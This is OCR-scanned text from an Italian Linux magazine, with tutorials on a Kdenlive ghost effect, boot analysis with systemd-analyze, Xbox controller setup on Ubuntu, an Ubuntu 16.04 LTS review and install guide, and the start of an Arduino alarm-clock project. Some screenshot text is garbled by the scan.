Cliccando sull'angolo in basso a sinistra della clip 

della traccia Video2, aggiungiamo una transizione 
tra questa clip e quella sottostante. Trasciniamo la transizio- 
ne in modo che si estenda per tutta la lunghezza della clip. 


Mode | Trasparenza 
Queraziona pdtanla ore “i venendo ti 


IL ROTOSCOPINGE... 
03 Al momento è in trasparenza anche l'attore e non solo 
il fantasma. Il problema si può risolvere aggiungendo 
l'effetto rotoscoping sulla clip della traccia Video2. Disegniamo, 
sull'anteprima, il contorno dell'area in cui si muove il fantasma. 


BI Il fantasma appare in sovrimpressione sulla parete dell'edificio 


metodo è però impraticabile qualora il fantasma dovesse passare 
davanti ad altri attori: in questo caso, è meglio seguire il metodo 
che spieghiamo in queste pagine. Come sempre, ecco un video 
d'esempio: www.youtube.com/watch?v=jVZqu-z1Rbk. 


Ele Modifica Progetto “rumenti Clip Timeline Menitor Visualizza Impastazioni Aiuto 
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L'OPACITÀ AL 50% 

La transizione non deve essere di tipo Dissolvi, ma 

di tipo Composito. L'opacità dovrebbe essere porta- 
ta circa al 50%: si può scegliere un valore più alto o più basso a 
seconda della resa che vediamo nell'anteprima. 


File Modifica Progetto Strumenti Clip Timeline Monitor Visualizza Impostazioni Aiuto 


{nuovo Lo} re [sete | 9) Annula © puts: {*) copia ({*) Incolla. (6) Esporta È 
Gestione effetti © x  Listadeglieffetti © x Monitorprogetti 
(x) Effetti per C0017.MP4 O tutto v (1) Fa 

1% Pi Rtoscoping © E e a Î 


v | + Manipolazione trasparenza 
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«slL FEATHERING 
04 Ciò che si trova dentro l'area apparirà in semitraspa- 
renza, il resto sarà invisibile (al suo posto si vedrà la 
clip della traccia Video3). Impostiamo Feather Width a 8 e Fea- 
thering passes a 2 per ammorbidire la transizione tra le clip. 
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Un effetto più verosimile 


Applichiamo le giuste correzioni per far apparire il fantasma in modo graduale 


File Modifica Progetto Strumenti Clip Timeline Monitor Visualizza Impel 
P x Si Risi [i 
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* Manipolazione traspar 

BR Rotoscoping | 
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# roto-gioco 

# roto-mio 
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ALLINEAMENTO 
01 La ripresa è fissa: non è necessario modificare la 
posizione del rotoscope. Possiamo approfittare della 
semitrasparenza del fantasma per allineare correttamente le 
due clip, di modo che le azioni siano sincronizzate. 


Fila Modifica Progetto Strumenti Clip Timeline Monitor Visualizza Impostazi 
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Senza modificare le impostazioni, torniamo all'inizio 
della transizione. Portiamo l'opacità al valore 0. In 
questo modo, Kdenlive porterà automaticamente l'opacità del 
fantasma al 50 % in 1 secondo, facendolo apparire gradualmente. 
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Cancella il Fotogramma chiave 


{Dimensione| 100,00% e 


Operazione sul canale alpha. Over 
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UN NUOVO FRAME 
02 Possiamo anche far apparire gradualmente il fan- 
tasma: scorrendo la transizione della clip del fanta- 
sma, posizioniamoci circa 1 secondo dopo l'inizio. Qui, creiamo 
un nuovo fotogramma chiave, cliccando sul pulsante +. 


urvature 5 ‘cure 


Luma w| Correzione colore | 
Ii rv. 
[Fs Rec. 709 Curvature 


LA CURVA DI LUCE 

Ora lavoriamo sulla clip con l'attore, quella della 

traccia Video3. Aggiungiamo un effetto Curvature. 
L'effetto dovrà essere attivato sul canale Luma, e la curva da di- 
segnare sarà rivolta verso l'alto, per aumentare la luminosità. 


MOVIMENTI E LUCI 


Meglio non sottovalutarli 


Questo trucco è molto facile da realizzare quando la camera è fer- 
ma. Se la camera dovesse muoversi è comunque possibile sfrut- 
tare questo metodo: l'importante è che la camera venga mossa 
sempre alla stesso modo ed alla stessa velocità. Per questo motivo 
si utilizzano delle dolly motorizzate, che però sono in genere molto 
costose. Naturalmente, è possibile costruirsi una dolly motorizzata 
rudimentale con Arduino ed un servomotore: esistono degli ap- 
positi progetti sul Web. Un altro trucco importante da considerare 
è l'illuminazione e la composizione della scena: l'effetto funziona 
molto bene finché lo sfondo ha delle forme ben definite. Se lo sfon- 
do fosse di un unico colore, non si capirebbe che il fantasma è in 
sovrimpressione. Si possono quindi esaltare le luci ed ombre dello 
sfondo aumentandone il contrasto con l'effetto Curvature. 
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BI Nel primo piano, la faccia del fantasma lascia 
‘intravedere in trasparenza gli alberi dello sfondo 


Le scene in primo piano 


Utilizziamo alcuni accorgimenti per migliorare le scene del fantasma in primo piano 


© x Listadeglieffetti 


(1) Tutto 


Gestione effetti 
v. Effetti per C0016.MP4 


ser: 


v A Curvature 


Canale Luma 


KH Salva effetto N 
SÌ Crea gruppo 
ES] crea una regione 


Formula Luma Rec. 709 


Virrrreminsrerti memi svenimento 


| 
| 


SALVIAMO L'EFFETTO... 
01 Nel disegnare la curva è consigliabile alza- 
re principalmente i mezzitoni, ma è consentito 
anche ritoccare le ombre. Terminate le modifiche, si può 
cliccare sul menu dell'effetto e scegliere la voce Salva ef- 
fetto, dandogli un nome. 


QeO ‘00:00:00:00 “| | | » Audio E 
FI_3ET__9eT o») ei 
lesene a ME) ® DAHDSREn 
ì - * DAHDSREn. 
ona 


uu 
Operazione sul canale alpha | - 


Allinea 
Riempimento 
Distorsione 


LA COMPOSIZIONE 
03 Se abbiamo un primo piano del fantasma, senza 
la presenza di altri attori, la situazione è più fa- 
cile da gestire: basta sovrapporre la clip del fantasma a 
quella dello sfondo, utilizzando la transizione Composito 
tra le due tracce. 


astione effetti © x  Listadeglieffetti È 
‘| Effetti per C0019.MP4 @ | tutto né È 
ERRE n PESI A me 
‘ # Curvature sr TEXT] [RISSA È 
|. w Correzione colore È 
anale Luma > 8 Ba Curvature È 
emula Luma Rec. 709 v * Personalizzato E 
# curvat È 
i 
È 
È 
ear 
n 

PIU CONTRASTO 

0 La curva deve essere disegnata per aumentare 


i mezzitoni e diminuire le ombre, in modo da 
aumentare il contrasto e ridurre le sfumature di lumino- 
sità. Sempre un effetto Curvature sul canale Luma, pos- 
siamo poi lavorare sulla clip dello sfondo. 


(5) Annulla @® Rifai ( Copia 0) Incolla (© Esporta 


© x  Listadeglieffetti è x 


@ tutto v 0 


Monitor progetto i 


5 \cuna qd 
isparenza w v Correzione colore. e 
Mi Curvature 
Iteoncler_______v} «Personalizzato 


# curvat 


«E UTILIZZIAMOLO SUBITO! 
0 A questo punto cerchiamo il nome appena scelto 
nell'elenco di tutti gli effetti disponibili, dovrem- 
mo riuscire a trovarlo. Possiamo quindi trascinarlo diret- 
tamente sulla clip della traccia Video2, così entrambe le 
clip avranno lo stesso effetto. 


File Modifica Progetto Strumenti Clip Timeline Monitor Visualizza In 
© Nuovo 4} Apri Hd Salva (5) Annulla € Rifai G Copia pi Incolla | 

Gestione effetti © x  Listadeglieffetti 

(v) Effetti per C0019.MP4 © nto v È 
v_ # Curvature SO cur ua: 

Canale Luma wi w Correzione colore: 

Formula Luma Rec. 709 Dia rea 


# curvai 


imrrir—nt__=__—e n 


UNA BASSA OPACITÀ 
04 L'opacità della transizione deve essere infe- 
riore al 50%, perché il fantasma risalterebbe 
troppo in un primo piano. Possiamo dare alla clip del fan- 
tasma un aspetto più etereo applicandole un effetto Cur- 
vature sul canale Luma. 


© Nuovo Leg] Aon fuse (5) Annulla (08 rifai D Copia 0) Incolla (© Esporta | 


Gestione effetti © x  Listadeglieffetti € 
v Effetti per Akashic_Records_-_Creepy_Ha.. @ rutto w 
vw # Dissolvenza in entrata Sti (disso i 
* Dissolvenza 


Durata UR 00:00. 03:03. si 


% Dissolvenza in entrata 
® Dissolvenza in uscita 


— sii coste eslisii. i lttcneni allerta rta cale core selen ariete sicari erre 


em 


ANCHE L'AUDIO 
0 In questo caso la curva va disegnata semplice- 
mente per aumentare al luminosità complessi- 
va, così da far risaltare lo sfondo dietro al fantasma. Per 
migliorare la resa, nel mamenta in cui appare il fantasma 
si può aggiungere una musica inquietante. 
seees 


esee 
e 
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FAI IL TAGLIANDO 
ALLA TUA DISTRO 


Stanco di un OS lento e zoppicante che impiega qualche secondo di troppo 
per completare l'avvio? Scopri subito la causa dei tuoi mali! 


on il passare del tempo qualsiasi sistema operativo perde velocità ed 
efficienza. Ciò può essere causato da diversi fattori: installazioni di 
tool mai utilizzati, difetti di configurazione o qualche software che 
impiega più risorse del dovuto. Prima dell'avvento di Systemd, per l'analisi 
della fase di boot di qualsiasi distro si faceva uso di Bootchart. Poi, le cose 
sono cambiate: Systemd ha infatti portato con sé un tool immediato che ef- 


fettua un'analisi molto simile a quella di Bootchart. Pertanto, se il sistema 
dovesse avviarsi più lentamente del solito basta lanciare una manciata di co- 
mandi per scoprire quali processi sono troppo lenti e dare una sistemata a ciò 
che non va. Il software in questione è systemd-analyze che offre una serie 
di opzioni per analizzare, ad esempio, il tempo di stazionamento nel kernel 


o nello userspace o capire come si svolge la fase di avvio dei vari processi. 


Non è necessaria alcuna installazione di software ag- 

giuntivo. Ubuntu ci offre tutto ciò di cui abbiamo biso- 
gno. Lanciamo da terminale systemd-analyze per scoprire subito 
iltempo di avvio del sistema (kernel mode e userspace]. 


marlo@valeria-ubuntu: -/ 


Il grafico è di facile comprensione ma se volessimo più 

dettagli esistono altri comandi da far seguire. Ad esem- 
pio, dump mostra una serie di informazioni sullo stato del sistema; 
blame, invece, il tempo dei servizi. 


Per avere un grafico dettagliato lanciamo systemd- 

analyze plot > grafico.svg. Con un qualsiasi visualizza- 
tore di immagini, apriamo grafico.svg (salvato nella home utente). 
Ogni processo è seguito dal tempo impiegato per l'avvio. 


Infine, il comando critical-chain offre una catena criti- 

ca dei processi, il che significa che a volte l'avvio non 
può continuare finché non terminano le operazioni di alcune unità: 
dunque, | punti critici che causano uno stallo. 


SUL PINGUINO 


Utilizziamo il controller della console di casa 


Microsoft anche per giocare sulla nostra distro 
GNU/Linux preferita 


ino a qualche tempo fa, pensare di 
giocare su GNU/Linux poteva risul- 
tare quasi comico. È vero che esiste- 
vano numerosi videogiochi Open Source, 


Mario Bonofiglio 


ma non erano certo paragonabili ai titoli più 
famosi diffusi sulle piattaforme proprietarie. 
Le possibilità di gioco ai titoli più interes- 
santi esistevano, ma il PC da gaming, almeno 


installiamo tutto il necessario 


Disabilitiamo il driver Xpad e installiamo il nuovo XboxDrv 


mario@valeria-ubuntu: — 


Controller Type: Xbox368 


- [ ERROR ] 

Error couldn't claim the USB interface: LIBU 

Try to run 'rmmod xp and then xboxdrv again or start xboxdrv with the option È 
--detach-kernel-driîv 
ari leria- nt udo xboxdrv -detach-kernel-driver 


VERIFICA DI XPAD 

A partire dalla versione 14.04, Ubuntu prevede il driver 

Xpad, compatibile con numerosi controller gamepad. 
Per verificarne il funzionamento basta digitare il comando xpad. 
Se il controller non compare, passiamo a un driver alternativo. 


mario@valeria-ubuntu: — 


tu:-$ sudo apt-get install xboxdrv 
co dei pacchetti 


anno installati: 


nati, 1 installati, 8 da rimuovere e 93 non aggiornati. 

io scaricare 8 B/663 kB di archivi. 
, Verranno occupati 1.748 kB di spazio su disco. 
il ca xboxdry non orecedentemente selezionato 


«.«ATTIVIAMO IL NUOVO! 

Per installare xboxdrv lanciamo sudo apt-get install 

xboxdrv. Al termine dell'installazione, lanciamo sudo 
xboxdrv e dovrebbe apparire una lista di parametri relativi agli 
assi del joystick e i pulsanti premuti. Terminiamo con Ctrl+C. 


eseo 
ess 


ee 
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DISABILITIAMO IL VECCHIO... 

Per poter usare XboxDrv dobbiamo prima disabilitare 

Xpad (non è possibile usare due driver per il control- 
ler). Lanciamo il comando sudo xboxdrv -detach-kernel-driver e, 
se non dovesse funzionare, sudo rmmod xpad. 


mario@valeria-ubuntu: - 
ACShutdown complete 
ar leria tu:-$ sudo xboxdrv -silent 


- [ ERROR ] - 
option require 


AVVIO SILENTE 

L'avvio del driver da terminale offre un'infinità di carat- 

teristiche poco utili all'utente medio. Lanciamo il driver 
in modo silente con sudo xboxdrv --silent: ci informerà soltanto 
relativamente al nome della periferica (nel nostro caso js1). 


nella visione comune, era equipaggiato con quindi una nuova esigenza: un controller di gamepad di una Xbox 360 funzioni anche su 
Microsoft Windows. Per fortuna, di recen- gioco evoluto e che risponda perfettamente una qualsiasi distribuzione GNU/Linux (per 
te le cose sono cambiate: grazie a Steam, il ai comandi. Abbiamo dunque deciso di dar- il nostro test ci siamo affidati ad Ubuntu). 
vero gaming su GNU/Linux è realtà. Nasce ci ad un divertente esperimento: far sì che il Scopriamo subito come fare. 


Mapping e uso del controller 


Configuriamo i pulsanti, eseguiamo la taratura e testiamo il controller con un qualsiasi gioco 


mario@valeria-ubuntu: — 


DA Joystick Prefe es 


leria-ubuntu:-$ sudo apt-get install jstest-gtk 
Lettura elenco dei pacchetti... Fatto 
generazione albero delle dipendenze 
Lettura informazioni sullo stato... Fatto 
acchetti suggeriti: 
jstest-gtk-dbg 
I seguenti pacchetti NUOVI saranno installati: 
jstest-gtk 
0 aggiornati, 1 installati, © da rimuovere e 93 non aggiornati. 
É necessario scaricare 129 kB di archivi. 
Dopo quest'operazione, verranno occupati 466 kB di spazio su disco. 


Xbox Gamepad (userspace driver) 
Device: /dev/input/js0 

Axes: 8 

Buttons: 11 


Xbox Gamepad (userspace driver) 
Device: /dev/input/js1 
Axes: 8 


caricamento di:1 http://it.archive.ubuntu.com/ubuntu/ wily/universe jstest-gtk 
amd64 0.1.1-git20140501-1build1 [129 kB] 

Recuperati 1 

e Lal 


UN ALTRO SOFTWARE 


Per configurare il nostro controller necessitiamo di un 
altro software. Lanciamo il comando sudo apt-get in- 


SETUP DA GUI 


Da Unity, avviamo il software appena installato e ve- 
dremo apparire una lista di controller (se ne abbiamo 


stall jstest-gtk ed avremo a disposizione una semplice interfaccia collegato più di uno). Nel nostro caso, ci interessa il controller 
grafica con la quale interagire per le nostre configurazioni. JS1. Se non compare, clicchiamo su Aggiorna. 

(è @ © xbox Gamepad (usarsnace driver) N DITTA 

0: amen pa CALIBRAZIONE lor comepn serpe ve MAPPING 

0 - IN CORSO E È DEI PULSANTI 
te | Selezioniamo il pen È Premiamo un 


| | controller e clicchiamo sul rieti birra pulsante del controller e, 


+ + + "E gna Spal Ueoran perni sogna ep 
| - pulsante Proprietà. Nella FINE CIONI pera a A pacino dopo aver preso nota del 
; i pa patore a 

sso A) nuova finestra, scegliamo hu TASSE CERA - numero corrispondente 
at ——_ | la voce Calibration e, in : Bepi pinta | segnalato, clicchiamo sul 
sus: CR | seguito, premiamo su Start È pra Risi ‘ tasto Mapping. Ad esempio, 
“a | Calibration. Ruotiamo il © az fon - trasciniamo il pulsante 7 - 
Ads Hina mzti to liti LE | 

ir extreme ; Itions at leastonce . . . . Mi E 
Act 3 Mov ala back to te cnr | joystick in modo da rilevare re | semi HuMEL . Start sul numero 6 ed ecco 
0 eabioie mu -. n: : Ax 10: BTN_THUMBR î . - 
muto ua. ‘ il fine corsa e riportiamo si negare - chealla pressione di Start 
O erermemieamt © | tutti gli assi uno per volta Etta tetti) È ora corrisponde il pulsante 
O oOE OD Do 


al centro. Superata questa 6. Ripetiamo l'operazione 


Mappi alibration #3 Mappi Calibration Ò 
= ce fase, terminiamo con Ok. Sa so DO per ogni tasto. 
CIA MAPPING 5 
{N UT] ha SI _ 
Add Remove Update Revert | AVANZATO e 
È Se vogliamo DB 
Joystick 1 ___Joystick2 s A & 
mappare la pressione di un . 
Axis 1: [KEYBOARD] Axis 2 : [KEYBOARD] - ; la 
- pulsante della tastiera con la 

Axis 3: [KEYBOARO] Axis 4: [KEYBOARD] “ î al 
Axis 5 : [KEYBOARD] Axis 6: [KEYBOARD] î pressione di un pulsante del Pal 
Axis 7 : [KEYBOARD] Axis 8: [KEYBOARD] controller possiamo affidarci sù 
Button 1:[NO KEY] Button 2 : {NO KEY] f al comodo tool Qjoypad. Per 2 


—- + = == = - installarlo, ci basta lanciare ste testi 
suttonr noxe] © sutone-monoi © da terminale il comando GLI ULTIMI RITOCCHI 
Button9:[NO KEY] |. sutton10:[vo key] | sudo apt-get install qjoypad. Premiamo sull'icona del controller e scegliamo Quick- 
Button 11 :{NO KEY] Poi, avviamolo digitan- Set. Ci viene chiesto di premere il pulsante del con- 
cine SIOE do, sempre da terminale, troller da mappare. Premiamo il tasto della tastiera che vogliamo 
“eosebiatoo= __—“9®%-__— qjoypad --notray. venga mappato, clicchiamo su Update e salviamo il profilo. 
scosso 


se 
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release primaverile di Ubuntu, la 16.04 LTS, questa volta 

battezzata dagli sviluppatori con il nome in codice di Xenial 
Xerus (letteralmente, scoiattolo amichevole). Una release, dunque, 
che racchiude la semplicità già nel suo nome. È davvero così? Noi 
abbiamo deciso di testarla a fondo e scoprire tutte le novità presenti 
in questo nuovo rilascio. 


pi come un orologio svizzero, ecco arrivare una nuova 


QUALCHE NOVITÀ, 
MA NESSUNA RIVOLUZIONE 


Fermi tutti: Unity 8 ancora non c'è, per lo meno non di default. 
Dobbiamo “accontentarci” dell'ampiamente collaudato Unity 7, 
ambiente desktop decisamente maturo ma che di fatto ha un po' 
seccato quegli utenti che hanno voglia di una ventata di novità. 
Invece, anche questa volta, in casa Canonical gli sviluppatori si 
sono limitati ad una rinfrescata dei software presenti out of the box 
(Mozilla Firefox e LibreOffice in primis), all'integrazione del ker- 
nel Linux 4.4 ed alla rimozione di tool ritenuti non più necessari: 
uno di questi è il client instant messaging Empathy. Uscita di scena 
anche per Ubuntu Software Center, che cede il passo a GNOME 
Software. 


NE VALE LA PENA? 


Chi prevedeva grandi novità si sbagliava di grosso. Dopotutto, la 
storia di Ubuntu insegna che dalle release LTS non c'è da aspettar- 
si molto in termini di innovazione. Si tratta quasi sempre, infatti, 
di versioni nate per offrire stabilità e sicurezza, senza attivare di 
default nuovi fronzoli o funzionalità. E proprio per questo motivo, 
l'installazione di Ubuntu 16.04 LTS non può che essere consigliata: 
per 5 anni potremo dormire sonni tranquilli certi di utilizzare una 
distro supportata attivamente dal team Canonical. Continuare ad 
utilizzare una release di Ubuntu prima di aggiornamenti di sicurez- 
za potrebbe mettere a repentaglio la nostra privacy. Dunque, non 
perdiamo altro tempo ed aggiorniamo subito il sistema! 


esse 
6s29 
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UBUNTU 16.04: 
ISTRUZIONI 
PER L'USO 


Xenial Xerus è stato rilasciato: ecco tutte le novità 
e la guida completa per muovere i primi passi 
nella nuova versione della distro più amata 

dagli utenti del Pinguino 


EEE RITERRÀ 
IL LAUNCHER IN BASSO 
Ecco come cambiare la posizione della barra laterale 


Una delle novità più interessanti di questa nuova rele- 
ase di Ubuntu è la possibilità di spostare la barra late- 
rale di Unity anche nella parte in basso dello schermo. 
Una novità, questa, che rende felici molti utenti perché, 
grazie all'ormai standard 16:9 dei display, è possibile 
settare un numero decisamente maggiore di launcher 
rispetto al passato. Uno dei metodi che ci consentono 

di spostare in basso la barra laterale di Unity, preve- 
de l'utilizzo del tool dconf-editor (in caso contrario, ci 
basta lanciare da terminale il comando sudo apt-get in- 
stall dconf-editor). Avviamolo [ricercandolo dalla Dash] 
e spostiamoci in com 3canonical 3 unity > launcher. 
A questo punto, clicchiamo sul launcher position e se- 
lezioniamo l'opzione bottom. Possiamo quindi chiudere 


dconf-editor e il gioco è fatto! 
dconf Editor 
Nome Valore 


favorite-migration 
favorites 
items 


['application://ubi 


|” canonical l'application:///dia 


a11y-profile-manager 
» desktop 
» indicator 
“ unity 
dash 
decorations 
devices 
integrated-menus 
interface 
launcher 
lenses 
webapps 


launcher-position Bottom 


e ma 


“Anche io voglio Ubuntu!” 


L'installazione della distro è semplice: ecco come portarla a termine correttamente in soli pochi minuti 


Benvenuti 
English È 
Espafiol O = 
Esperanto È 
Euskara 
Frangais È 
Gaeilge È 
Galego E 
Hrvatski È 
istenska RE E 
Italiano [= 
Kurdî Prova Ubuntu Installa Ubuntu E 
Latviski SITI > È 
Lietuviskai È 
È possibile provare Ubuntu direttamente da questo supporto (CD) senza apportare alcuna modifica € 
E 


computer. 


IL PRIMO AVVIO 

Dopo aver inserito nel lettore del PC il DVD (singo- 
lo o Lato A) allegato a questo numero di Linux Ma- 
gazine, settiamo dal BIOS il boot da periferica esterna. Dopo 
qualche secondo, apparirà la schermata iniziale di Ubuntu 
16.04 LTS. Clicchiamo su Installa Ubuntu. 


01 


Installa (as superuser) 


Tipo d'installazione 


Non è stato trovato alcun sistema operativo installato su qu 


el 
I 
È 


© Cancella il disco e installa ubuntu 
Attenzione: in questo modo verranno eliminati programmi, nic 


SOLO UBUNTU! 


03 Possiamo ovviamente creare un dual boot ma nel 

nostro caso, vogliamo utilizzare unicamente Ubun- 

tu 16.04 LTS: dunque, clicchiamo su Cancella il disco e installa 

Ubuntu e proseguiamo con Installa. Possiamo inoltre cifrare il 
file system per rendere più sicuri i nostri dati. 


Disposizione della tastiera 


Sceglierela disposizione della tastiera: 
Inglese (USA) s 


Iracheno Italiana - Geo 
Irlandese Italiana - 
Islandese Italiana - 
CERO SZIZZAZE talea. 
Kazaka Italiana - 
\Khmer (Cambogia) Italiana - 
Kirghiza | 


IL GIUSTO LAYOUT 

Che layout ha la nostra tastiera? Nella maggior par- 

te dei casi, sarà sicuramente italiana. Selezioniamo 
quindi la giusta opzione da Scegliere la disposizione della ta- 
stiera, verifichiamo nell'apposito campo che sia quella corret- 
ta e proseguiamo con Avanti. 


Installa (as superuser) 


Preparazione all'installazione di Ubuntu 


Scaricare gli aggiornamenti durante l'installazione di Ubuntu 
Ciò consente di risparmiare tempo dopo l'instaltazione. 


installare software di terze parti per periferiche grafiche e Wi-Fi, Flash, MP3 e altri formati 
This software is subject to license terms included with its documentation. Some is proprietary. 
Il plugin MP3 di Fluendo include tecnologia di decodifica audio MPEG Layer-3 concessa in licenza da Fraunhofer HS e 


| 


UPDATE E CODEC 
0 2 È consigliabile spuntare la voce Scaricare gli aggior- 
namenti durante l'installazione di Ubuntu, per ri- 
cevere tutti i pacchetti più recenti. Inoltre, se vogliamo utilizzare 
driver e codec proprietari spuntiamo anche la seconda voce. Pro- 
seguiamo con Avanti. 


DATA E ORA 
0 h In questa fase dell'installazione guidata dobbiamo 
fornire qualche indicazione per configurare al meglio 
il sistema. Ad esempio, ci verrà richiesto di selezionare la nostra 
Località per impostare correttamente l'orario. Nel caso dell'Ita- 
lia, selezioniamo Roma e proseguiamo con Avanti. 


LS 
mm 


Ilvostro nome: | vincenzo 


ilnome del computer: { vincenzo-LM |q 
il nome utilizzato per essere identificato da altri computer. 


Scegliere un nome utente: | vincenzo 1g 


Scegliere una password: | @0®® } Password corta 


IA] PR 
Confermare la password: | ®@®@®®| DÀ 
©) Accedere automaticamente 
© Richiedere la password personale per accedere 
TM) cifrare la cartella personale 


TUTTO PRONTO! 
Indichiamo un nome per l'utente, uno per identifica- 
re nella rete locale il PC e scegliamo una password di 
‘ accesso. Spuntiamo la voce Richiedere la password personale 
per accedere e clicchiamo su Avanti. Non ci resta che attendere il 
termine dell'installazione dell'OS. 


esso 
eoc°so 


ce 
Maggio/Giugno 2016 €265 


IL “SOLITO” UNITY 

In quel di Canonical hanno ritenuto 
opportuno rimandare il debutto chiacchierato 
Unity 8. Forse è stata la migliore soluzione, se si 
considera che siamo di fronte ad una release LTS. 
In ogni caso, se fremiamo dalla voglia di provare 
il nuovo ambiente desktop, possiamo installarlo 
manualmente: tutto quello che dobbiamo fare è 
lanciare da terminale il comando sudo apt-get 
install unity8-desktop-session-mir. 


GLI APP INDICATOR 


Le icone che ci permettono di controllare 
rapidamente lo stato della rete, di settare il volu- 
me degli altoparlanti e del microfono, di passare 
da un utente all'altro o di arrestare il sistema sono 
rimasti pressoché identici al passato: squadra che 
vince non si cambia, almeno fino a quando Unity 
8 non debutterà ufficialmente. 


UN NUOVO FIREFOX 

Negli ultimi mesi, gli sviluppatori di casa 
Canonical hanno diverse volte discusso circa il 
futuro di Mozilla Firefox come browser predefini- 
to di Ubuntu. Il motivo? La cessazione di NPAPI 
(entro la fine del 2016). Ciò vuol dire che molti 
plug-in potrebbero non funzionare più. In ogni 
caso, almeno per questa volta, gli sviluppatori 
hanno deciso di affidarsi nuovamente a Firefox, 
in particolare, alla recente release 45.0.1. 


® About Mozilla Firefox 


Firefox 


45.0.1 

Mozilla Firefox for Ubuntu 

canonical - 1,0 

Firefox is designed by Mozilla, a 

global communityworking together to keep 
the Web open, public and accessibleto all. 


Want to help? Make a donation or 
get involved! 


Licensing Information End-User Rights Privacy Policy 


PERLATUA , 
PRODUTTIVITA 


LibreOffice resta la migliore soluzione Open per 
l'editing di testi, di fogli di lavoro o di presentazio- 
ni multimediali. Per Ubuntu 16.04 LTS, il team 
Canonical ha deciso di utilizzare la release 5.1.2.2 
dell'apprezzata suite d'ufficio. Una release che mi- 
gliora la compatibilità con i formati file proprietari 
che, purtroppo, rimangono i più diffusi. 


Versione: 5.1.2.2 
Build ID: 1:5.1.2-Qubuntut 
Thread CPU: 2; Versione SO: Linux 4.4; Resa interfaccia: predefinito; 
Versione locale: it-T (it_iT.UTF-8) 


LibreOffice è una suite per ufficio moderna e di facile utilizzo per 
la redazione di testi, fagli elettronici, presentazioni e altro ancora. 


Questo rilascio è stato fornito da The Document Foundation, Debian and Ubuntu. 
Copyright © 2000-2016 Contributori di LibreOffice. 
LibreOffice era basato su OpenOffice.org. 


Riconoscimenti Sito web 


CIZLLI 
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Ubuntu Desktop 


ADDIO AL SOFTWARE 
CENTER 


Fuori il “vecchio” Ubuntu Software Center, den- 
tro G TE Software, un gestore dei pacchetti 
una maggiore stabilità e, soprattutto, 
velocità della soluzione inizialmente sviluppa- 
ta internamente in Canonical. Così, l'Ubuntu 
Software Center viene mandato ufficialmente in 
pensione e, quasi certamente, non verrà ric 


con nostalgia dagli utenti. 


Applicazione in evidenza 
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RSA 


Selezionate da noi 
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Getting Thin... Shutter 


Applicazioni grafiche consigliate 


LibreOffice ... Shotwell Darktable 


ANCORA AMAZON!? 


Un accordo, quello che c'è tra Canonical 


e Amazon, ormai lungo circa 4 anni. Eppure, 
quell'icona presente nella barra laterale di Unity 
non piace proprio a nessuno. Perché il team 
Ubuntu non dà ascolto ai suoi utenti? In ogni 
caso, ci basta un clic destro sull'icona stessa e la 
selezione dell'opzione Sblocca dal Launcher per 


disfarcene in un secondo. 


IL CENTRO 
DI CONTROLLO 


La schermata di Impostazioni del sistema di 
Ubuntu 16.04 LTS non è diversa da quella già 
vista nelle precedenti release. Di default, per la 
felicità degli utenti, sono disattivati i risultati di 
ricerca provenienti dal Web e restituiti all'interno 
della Dash di Unity. Se vogliamo abilitarli, ci basta 
cliccare su Sicurezza e privacy, spostarci nel tab 
Ricerca ed attivare l'opzione Includere i risultati 
da ricerche online. 


Sicurezza e privacy 


Tutte le impostazioni Sicurezza e privacy 


Sicurezza File eapplicazioni Ricerca Diagnostica 


Quando si eseguono ricerca dalla Dash: 
\ 
Includere i risultati da ricerche online 


SFONDI RINNOVATI 


Come di consueto, ogni nuova release di 
Ubuntu, LTS o meno che sia, porta con sé un nuo- 
vo set di sfondi statici o animati. Il tema predefinito 
del sistema rimane sempre il collaudato Ambiance 
ma, come ben sappiamo, scaricarne ed installarne 
di nuovi è davvero un gioco da ragazzi. 

© Aspetto 


Tutte le impostazioni . Aspetto 


Aspetto | Comportamento 
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Sfondo attuale (4096 » 2304) 


BEI 1091andimento + 


Tema Amblance (Predefinto) 


Dimensione icone del Launcher 
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Informazioni sul computer 2 
Aiuto di Ubuntu... 


Impostazioni di sistema... 


Blocca 
® Sessioneospite 


® vincenzo (4) 


Termina sessione... 


Sospendi 
Arresta... 


Nuova cartella 
Nuovo documento > 


Aprì terminale 


Ordina icone per nome 
« Mantieni allineate 


Cambia sfondo scrivania 
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La sveglia 


Open Source 


Realizzarla è un gioco da ragazzi! Ti bastano una manciata di componenti 
e un ATMEGA328: il codice te l'offriamo noi 


Il codice completo lo trovi su: www.edmaster.it/url/5772 


1 di là del progetto, a cui si potrebbe non essere interes- 
Ai l'obiettivo principale di queste pagine è quello di 

illustrare il tipico concetto di ottenere il massimo delle 
funzioni con il minimo dei componenti e, perché no, dei costi. 
Nello specifico vedremo come con un comune display LCD 16x2 
su bus I2C e 4 pulsanti sia possibile visualizzare e gestire tutte le 
funzioni che ci occorrono per realizzare una completa radiosve- 
glia Open Source con datario comprensiva di sensori. 
Capiremo anche come le caratteristiche di questo sistema possa- 
no essere ulteriormente aumentate in funzione degli obiettivi che 
potremo prefiggerci. Non solo, approfitteremo di questo progetto 
relativamente semplice per illustrare come creare un codice sor- 
gente quando il componente da utilizzare non presenta le librerie 
necessarie da implementare nell'IDE: in questi casi, come dobbia- 
mo comportarci? Procediamo per passi. 


Michele Petrecca 


LA FUNZIONE RTC 


Acronimo di Real Time Clock, l'RTC è un circuito integrato con- 
tatore il quale partendo da una frequenza di 32.768 Hz (generata 
da un oscillatore locale al quarzo applicato su piedini specifici) 
è in grado di creare un impulso al secondo (frequenza di 1 Hz) 
necessario a pilotare la logica interna di controllo al fine di con- 
teggiare secondi, minuti, ore, giorni, mesi (ricavandosi da questi 
il giorno della settimana) e anni. 

Il numero dei giorni del mese è automaticamente regolato inclu- 
dendo la presenza o meno di anni bisestili. È anche possibile sce- 
gliere il formato delle ore: 0-23 oppure 0-12 con l'indicazione 
AM/PM a cui aggiungere, a seconda delle scelte sull'integrato 
RTC, in genere 1 o 2 allarmi programmabili, indispensabili se si 
vuole ottenere la funzione di sveglia. 

Il conteggio rimarrà regolare anche in mancanza della tensione 
di alimentazione a patto che sia presente una batteria di backup: 
in genere, non in tutti i casi, una CR1225 (datasheet allegato) da 
3V al litio. Tutti i valori, dai secondi all'anno, sono mantenuti 


EEERENZO SIRIO ERE ZIS] 
I TERMINI DA TENERE BEN IN MENTE 


| Un po' di teoria prima di passare alla pratica 


- Nell'ambito di una misura del tempo, come potrebbe 
essere anche quella di un comune orologio, diversi 
termini possono entrare in gioco analogamente ai sen- 
sori. Possiamo annoverare la Precisione, sinonimo di 
riproducibilità della misura: è affetta da errori casuali. 

Accuratezza (o Accuracy), differenza tra ilvalore vero e 
ilvalore misurato: una misura accurata è anche preci- 
